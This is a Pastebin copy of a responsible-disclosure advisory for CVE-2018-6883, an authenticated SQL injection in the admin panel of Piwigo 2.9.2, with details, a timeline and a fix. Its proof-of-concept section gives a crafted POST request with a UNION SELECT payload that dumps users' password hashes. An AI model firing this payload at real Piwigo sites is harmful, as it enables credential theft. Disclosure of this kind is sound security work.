daily pastebin goal
27%
SHARE
TWEET

Untitled

jorkro Feb 24th, 2018 475 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Document Title:
  2. ===============
  3. Piwigo v2.9.2 - SQL injection in administration panel
  4.  
  5.  
  6. CVE-ID:
  7. =======
  8. CVE-2018-6883
  9.  
  10.  
  11. Release Date:
  12. =============
  13. 2018-02-11
  14.  
  15.  
  16. References:
  17. =============
  18. https://github.com/Piwigo/Piwigo/issues/839
  19.  
  20.  
  21. Common Vulnerability Scoring System:
  22. ====================================
  23. 3.8 (AV:N/AC:H/Au:S/C:C/I:N/A:N/E:F/RL:TF/RC:UC/CDP:N/TD:ND/CR:ND/IR:ND/AR:ND)
  24.  
  25.  
  26. Vulnerability Class:
  27. ====================
  28. SQL injection
  29.  
  30.  
  31. Product & Service Introduction:
  32. ===============================
  33. Piwigo is photo gallery software for the web, built by an active community of users and developers. Freely available extensions can be used to customize Piwigo. It is written in PHP using MySQL as a database server.
  34.  
  35.  
  36. Abstract Advisory Information:
  37. ==============================
  38. An SQL injection has been discovered in the administration panel of Piwigo (version 2.9.2).
  39.  
  40.  
  41. Vulnerability Disclosure Timeline:
  42. ==================================
  43. 2018-02-10: Requested CVE ID
  44. 2018-02-11: Informed vendor
  45. 2018-02-21: Acknowledged by vendor
  46. 2018-02-22: Patch created by vendor
  47.  
  48.  
  49. Discovery Status:
  50. =================
  51. Fixed
  52.  
  53.  
  54. Affected Product(s):
  55. ====================
  56. Piwigo
  57. Product: Piwigo - Content Management System (Web-Application) 2.9.2
  58.  
  59.  
  60. Exploitation Technique:
  61. =======================
  62. Remote
  63.  
  64.  
  65. Severity Level:
  66. ===============
  67. Low
  68.  
  69.  
  70. Authentication Type:
  71. ====================
  72. Requires admin privileges
  73.  
  74.  
  75. User Interaction:
  76. =================
  77. Low User Interaction
  78.  
  79.  
  80. Disclosure Type:
  81. ================
  82. Independent Security Research
  83.  
  84.  
  85. Technical Details & Description:
  86. ================================
  87. An SQL injection has been discovered in the administration panel of Piwigo v2.9.2. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query. This could result in full information disclosure.
  88.  
  89. The SQL injection vulnerability was found in admin/tags.php and is done by injecting SQL code in the 'tags' POST variable. This variable is only sanitized by addslashes() and is not encapsulated by quotes in the concatenated SQL string allowing the injection to work. Furthermore, the result set is part of the page output allowing information disclosure about other tables in the database.
  90.  
  91. The POST variables 'edit_list' and 'merge_list' are also vulnerable to this attack, however, no exploit exist to disclose information through these variables. A separate vulnerability report was made for 'edit_list' (CVE-2017-16893).
  92.  
  93. The security risk of the vulnerability is estimated as low with a CVSS score of 3.8. Exploitation of the web vulnerability requires the attacker to be authenticated as administrator.
  94.  
  95. Request Method(s):
  96. [+] POST
  97.  
  98. Vulnerable File(s):
  99. [+] admin/tags.php
  100.  
  101. Vulnerable Parameter(s):
  102. [+] edit_list
  103. [+] merge_list
  104. [+] tags
  105.  
  106. Affected Module(s):
  107. [+] Backend
  108.  
  109.  
  110. Proof of Concept (PoC):
  111. =======================
  112. Once the attacker obtains a session of an administrator, the attacker can then send a POST request with a specially crafted to /admin.php?page=tags as follows:
  113.  
  114. POST http://localhost/piwigo/admin.php?page=tags HTTP/1.0
  115. Content-Type: application/x-www-form-urlencoded
  116. Cookie: <ADMIN COOKIE>
  117.  
  118. pwg_token=<TOKEN>&tags%5B%5D=-1)%20UNION%20(SELECT%20password%20FROM%20piwigo_users&selectAction=delete&confirm_deletion=1&delete=
  119.  
  120. The result page will have the password hashes of all users at this line:
  121.  
  122. "The following 4 keywords have been deleted : XXXX, XXXX, XXXX, XXXX"
  123.  
  124.  
  125. Solution - Fix & Patch:
  126. =======================
  127. Introduce further sanitization of the $_POST['edit_list'], $_POST['merge_list'], and $_POST['tags'] variable by limiting the input to an array of integers only.
  128.  
  129.  
  130. Security Risk:
  131. ==============
  132. The security risk of this SQL injection that requires admin privileges is estimated to be low (CVSS score 3.8)
  133.  
  134.  
  135. Credits & Authors:
  136. ==================
  137. Jorrit Kronjee <jorrit at wafel dot org>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top